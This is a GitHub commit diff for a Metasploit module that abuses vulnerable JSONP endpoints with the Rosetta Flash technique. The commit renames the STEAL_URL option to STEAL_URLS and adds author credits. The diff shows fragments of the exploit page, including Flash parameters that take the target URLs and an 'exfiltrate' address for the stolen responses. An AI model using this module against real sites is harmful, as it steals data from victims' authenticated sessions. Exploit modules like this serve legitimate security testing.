Skip to content

Commit 841cb6a

Browse files
committed
STEAL_URL -> STEAL_URLS.
1 parent fad30bc commit 841cb6a

File tree

1 file changed

+5
-6
lines changed

1 file changed

+5
-6
lines changed

modules/auxiliary/gather/flash_rosetta_jsonp_url_disclosure.rb

Lines changed: 5 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -22,12 +22,12 @@ def initialize(info = {})
2222
2323
This module spins up a web server that, upon navigation from a user, attempts
2424
to abuse the specified JSONP endpoint URLs by stealing the response from
25-
GET requests to STEAL_URL.
25+
GET requests to STEAL_URLS.
2626
},
2727
'License' => MSF_LICENSE,
2828
'Author' => [
29-
'Michele Spagnuolo',
30-
'joev'
29+
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
30+
'joev' # msf module
3131
],
3232
'References' =>
3333
[
@@ -45,9 +45,8 @@ def initialize(info = {})
4545
[
4646
OptString.new('CALLBACK', [ true, 'The name of the callback paramater', 'callback' ]),
4747
OptString.new('JSONP_URL', [ true, 'The URL of the vulnerable JSONP endpoint', '' ]),
48-
OptString.new('STEAL_URL', [ true, 'The URL to steal the contents of', '' ]),
4948
OptBool.new('CHECK', [ true, 'Check first that the JSONP endpoint works', true ]),
50-
OptString.new('STEAL_URL', [ true, 'The URL to steal the contents of', '' ]),
49+
OptString.new('STEAL_URLS', [ true, 'A comma-separated list of URLs to steal', '' ]),
5150
OptString.new('URIPATH', [ true, 'The URI path to serve the exploit under', '/' ])
5251
],
5352
self.class)
@@ -113,7 +112,7 @@ def exploit_html
113112
<object type="application/x-shockwave-flash" data="#{exploit_url(encoded_swf)}"
114113
width=500 height=500>
115114
<param name="FlashVars"
116-
value="url=#{URI.escape datastore['STEAL_URL']}&exfiltrate=#{ex_url}" />
115+
value="url=#{URI.escape datastore['STEAL_URLS']}&exfiltrate=#{ex_url}" />
117116
</object>
118117
</body>
119118
</html>

0 commit comments

Comments
 (0)